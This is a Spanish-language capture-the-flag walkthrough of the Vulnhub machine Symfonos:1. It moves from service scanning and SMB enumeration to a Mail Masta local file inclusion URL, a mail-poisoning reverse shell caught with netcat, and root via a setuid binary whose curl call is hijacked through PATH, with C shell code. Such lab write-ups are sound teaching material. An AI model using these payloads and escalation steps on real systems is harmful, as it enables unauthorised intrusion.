__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [Vulnhub] Symfonos:1[1]

NMAP
-----

--[sml@cassandra][~/vulnhub/symfonos]
$nmap -p- -A 192.168.20.154
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 19:23 CEST
Nmap scan report for 192.168.20.154
Host is up (0.0012s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m08s, deviation: 2h53m12s, median: 8s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-07-07T12:23:48-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-07 19:23:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds



GOBUSTER
--------

--[sml@cassandra][~]
$gobuster -w /usr/share/wordlists/dirb/big.txt -u 192.168.20.154

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.20.154/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/07 19:25:47 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2019/07/07 19:25:50 Finished
=====================================================



ENUM4LINUX
-----------

--[..][sml@cassandra][~]
$enum4linux -a 192.168.20.154
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul  7 19:43:34 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.20.154
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.20.154    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.20.154    |
 ============================================== 
Looking up status of 192.168.20.154
	SYMFONOS        <00> -         B   Workstation Service
	SYMFONOS        <03> -         B   Messenger Service
	SYMFONOS        <20> -         B   File Server Service
	..__MSBROWSE__. <01> -  B   Master Browser
	WORKGROUP       <00> -  B   Domain/Workgroup Name
	WORKGROUP       <1d> -         B   Master Browser
	WORKGROUP       <1e> -  B   Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.20.154    |
 ======================================= 
[+] Server 192.168.20.154 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.20.154    |
 ============================================= 
Unable to initialize messaging context
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.20.154    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.20.154 from smbclient: 
[+] Got OS info for 192.168.20.154 from srvinfo:
Unable to initialize messaging context
	SYMFONOS       Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 =============================== 
|    Users on 192.168.20.154    |
 =============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: helios	Name: 	Desc: 

user:[helios] rid:[0x3e8]

 =========================================== 
|    Share Enumeration on 192.168.20.154    |
 =========================================== 
Unable to initialize messaging context

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            

[+] Attempting to map shares on 192.168.20.154
//192.168.20.154/print$	Mapping: DENIED, Listing: N/A
//192.168.20.154/helios	Mapping: DENIED, Listing: N/A
//192.168.20.154/anonymous	Mapping: OK, Listing: OK
//192.168.20.154/IPC$	[E] Can't understand response:
Unable to initialize messaging context
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================== 
|    Password Policy Information for 192.168.20.154    |
 ====================================================== 


[+] Attaching to 192.168.20.154 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] SYMFONOS
	[+] Builtin

[+] Password Info for Domain: SYMFONOS

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================ 
|    Groups on 192.168.20.154    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

        

SMBCLIENT
---------

Nos conectamos como anonymous (password en blanco) y nos descargamos el fichero.

--[sml@cassandra][~/vulnhub/symfonos]
$smbclient \\\\192.168.20.154\\anonymous
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17303080 blocks available
		
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50,1 KiloBytes/sec) (average 50,1 KiloBytes/sec)
smb: \> exit

--[sml@cassandra][~/vulnhub/symfonos]
$cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus


Nos conectamos con el usuario "helios" visto en enum4linux.
El password es qwerty.

--[..][sml@cassandra][~]
$smbclient \\\\192.168.20.154\\helios --user helios
Unable to initialize messaging context
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17302288 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (210,9 KiloBytes/sec) (average 210,9 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25,4 KiloBytes/sec) (average 118,2 KiloBytes/sec)


--[sml@cassandra][~]
$cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
--[sml@cassandra][~]
$cat todo.txt 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

WPSCAN
-------

--[sml@cassandra][~]
$wpscan --url http://symfonos.local/h3l105/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/
[+] Started: Wed Jul 10 20:45:20 2019

Interesting Finding(s):

[+] http://symfonos.local/h3l105/
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, https://wordpress.org/?v=5.2.2
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, https://wordpress.org/?v=5.2.2

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Latest Version: 1.4 (up to date)
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9044
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - http://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Jul 10 20:45:25 2019
[+] Requests Done: 22
[+] Cached Requests: 36
[+] Data Sent: 4.495 KB
[+] Data Received: 3.474 KB
[+] Memory used: 189.371 MB
[+] Elapsed time: 00:00:04

Vemos que es vulnerable a LFI [2] usando las instrucciones de exploitdb.

Si visitamos el siguiente enlace:
http://192.168.131.130/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/mail/helios 

Podemos ver que a traves del LFI tenemos acceso al mail de helios. Sabiendo esto nos conectamos al SMTP
para enviar un mail a helios que contenga una revere shell.

SMTP
----

--[sml@cassandra][~]
$telnet 192.168.131.130 25
Trying 192.168.131.130...
Connected to 192.168.131.130.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
mail from: loco
250 2.1.0 Ok
rcpt to: helios
250 2.1.5 Ok
data
354 End data with .

--AQUI SE PEGA LA REVERSE SHELL.PHP--
.
250 2.0.0 Ok: queued as 6824840762

LOW SHELL
----------

En la maquina atacante lanzamos un nc esperando la conexion.

--[sml@cassandra][~]
$nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.131.128] from (UNKNOWN) [192.168.131.130] 37688
Linux symfonos 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 GNU/Linux
 12:04:22 up 35 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Buscamos ficheros con setuid.

$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

Vemos que statuscheck no es un "habitual". Lo exploramos.

$ /opt/statuscheck
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0   328    0     0    0     0      HTTP/1.1 200 OK-- --:--:-- --:--:--     0
Date: Sun, 14 Jul 2019 14:23:31 GMT
Server: Apache/2.4.25 (Debian)

$ strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL

Con strings vemos que usa el binario "curl".
Escribimos y compilamos el siguiente codigo en /tmp/a.c que nos dara una shell como root.
 
$ cat a.c
#include 
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0); 
return 0;
}
$ gcc -o curl a.c

Una vez compilado, cambiamos el PATH, para que ejecute primero nuestro "curl" en lugar
de el "original".

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export PATH=/tmp:$PATH
$ /opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)

cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!

[1] https://www.vulnhub.com/entry/symfonos-1,322/
[2] https://en.wikipedia.org/wiki/File_inclusion_vulnerability
[3] https://www.exploit-db.com/exploits/40290/